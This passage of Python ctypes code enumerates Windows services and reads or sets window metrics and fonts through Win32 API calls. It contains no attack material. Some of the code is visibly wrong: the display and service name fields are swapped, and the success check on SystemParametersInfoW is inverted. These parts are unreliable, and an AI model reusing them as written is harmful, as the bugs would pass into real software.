SERVICE_KERNEL_DRIVER | SERVICE_WIN32, windows_constants.SERVICE_WIN32, windows_constants.SERVICE_STATE_ALL, status_array, service_byte_count, byref(bytes_needed), byref(service_count), byref(resume_handle), None ) if res != 0: break err = WindowsErrorMessage('advapi32.EnumServicesStatusExW') if err.errno != windows_constants.ERROR_MORE_DATA: # return err return () print("need {0} bytes".format(bytes_needed)) service_byte_count = bytes_needed count = bytes_needed.value // c_sizeof(ENUM_SERVICE_STATUS_PROCESS) status_array = (ENUM_SERVICE_STATUS_PROCESS * count)() if not status_array: # Nothing found on first pass. return () ret: List[ProcessMetrics] = [] for i in range(service_count.value): status = status_array[i] controls_accepted = [] if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_NETBINDCHANGE): controls_accepted.append('SERVICE_ACCEPT_NETBINDCHANGE') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_PARAMCHANGE): controls_accepted.append('SERVICE_ACCEPT_PARAMCHANGE') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_PAUSE_CONTINUE): controls_accepted.append('SERVICE_ACCEPT_PAUSE_CONTINUE') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_PRESHUTDOWN): controls_accepted.append('SERVICE_ACCEPT_PRESHUTDOWN') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_SHUTDOWN): controls_accepted.append('SERVICE_ACCEPT_SHUTDOWN') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_STOP): controls_accepted.append('SERVICE_ACCEPT_STOP') ret.append(ProcessMetrics( display_name=status.lpServiceName.value, service_name=status.lpDisplayName.value, service_type=( status.dwServiceType in _SERVICE_TYPES and _SERVICE_TYPES[status.dwServiceType] or None ), current_state=( status.dwCurrentState in _SERVICE_CURRENT_STATES and _SERVICE_CURRENT_STATES[status.dwCurrentState] or None ), controls_accepted=controls_accepted, exit_code=status.dwWin32ExitCode, service_exit_code=status.dwServiceSpecificExitCode, check_point=status.dwCheckPoint, wait_time_millis_hint=status.dwWaitHint, process_id=status.dwProcessId, flags=status.dwServiceFlags == 1 and ['SERVICE_RUNS_IN_SYSTEM_PROCESS'] or [], )) return ret finally: CloseServiceHandle(sc) def _has_bit_set(dw: DWORD, bit_mask: int) -> bool: return (dw.value & bit_mask) == bit_mask # https://msdn.microsoft.com/en-us/library/windows/desktop/dd145037(v=vs.85).aspx class LOGFONT(Structure): _fields_ = [ ("lfHeight", LONG), ("lfWidth", LONG), ("lfEscapement", LONG), ("lfOrientation", LONG), ("lfWeight", LONG), ("lfItalic", BYTE), ("lfUnderline", BYTE), ("lfStrikeOut", BYTE), ("lfCharSet", BYTE), ("lfOutPrecision", BYTE), ("lfClipPrecision", BYTE), ("lfQuality", BYTE), ("lfPitchAndFamily", BYTE), # Even though we use the W version of the call, we # still are expected to use CHAR, not WCHAR here. ("lfFaceName", CHAR * windows_constants.LF_FACESIZE), ] # https://msdn.microsoft.com/en-us/library/windows/desktop/ff729175(v=vs.85).aspx class NONCLIENTMETRICS(Structure): _fields_ = [ ("cbSize", UINT), ("iBorderWidth", c_int), ("iScrollWidth", c_int), ("iScrollHeight", c_int), ("iCaptionWidth", c_int), ("iCaptionHeight", c_int), ("lfCaptionFont", LOGFONT), ("iSmCaptionWidth", c_int), ("iSmCaptionHeight", c_int), ("lfSmCaptionFont", LOGFONT), ("iMenuWidth", c_int), ("iMenuHeight", c_int), ("lfMenuFont", LOGFONT), ("lfStatusFont", LOGFONT), ("lfMessageFont", LOGFONT), ] def shell__get_window_metrics() -> Union[WindowMetrics, WindowsErrorMessage]: metrics = shell__get_raw_window_metrics() if isinstance(metrics, WindowsErrorMessage): return metrics return WindowMetrics( border_width=metrics.iBorderWidth.value, scroll_width=0, scroll_height=metrics.iScrollHeight.value, caption_width=metrics.iCaptionWidth.value, caption_height=metrics.iCaptionHeight.value, caption_font=_font_to_dict(metrics.lfCaptionFont), sm_caption_width=metrics.iSmCaptionWidth.value, sm_caption_height=metrics.iSmCaptionHeight.value, sm_caption_font=_font_to_dict(metrics.lfSmCaptionFont), menu_width=metrics.iMenuWidth.value, menu_height=metrics.iMenuHeight.value, menu_font=_font_to_dict(metrics.lfMenuFont), status_font=_font_to_dict(metrics.lfStatusFont), message_font=_font_to_dict(metrics.lfMessageFont), # XP does not support this value. padded_border_width=0 ) def shell__get_raw_window_metrics() -> Union[NONCLIENTMETRICS, WindowsErrorMessage]: SystemParametersInfoW = windll.user32.SystemParametersInfoW metrics = NONCLIENTMETRICS() metrics.cbSize = c_sizeof(NONCLIENTMETRICS) res = SystemParametersInfoW(windows_constants.SPI_GETNONCLIENTMETRICS, metrics.cbSize, byref(metrics), 0) if res != 0: return WindowsErrorMessage('user32.SystemParametersInfoW') return metrics _BASE_OS_METRICS: List[Optional[NONCLIENTMETRICS]] = [None] def shell__set_window_metrics(metrics: WindowMetrics) -> Optional[WindowsErrorMessage]: return inner__set_window_metrics(metrics) def inner__set_window_metrics(metrics: Union[NONCLIENTMETRICS, WindowMetrics]) -> Optional[WindowsErrorMessage]: SystemParametersInfoW = windll.user32.SystemParametersInfoW # Always actions the original user metrics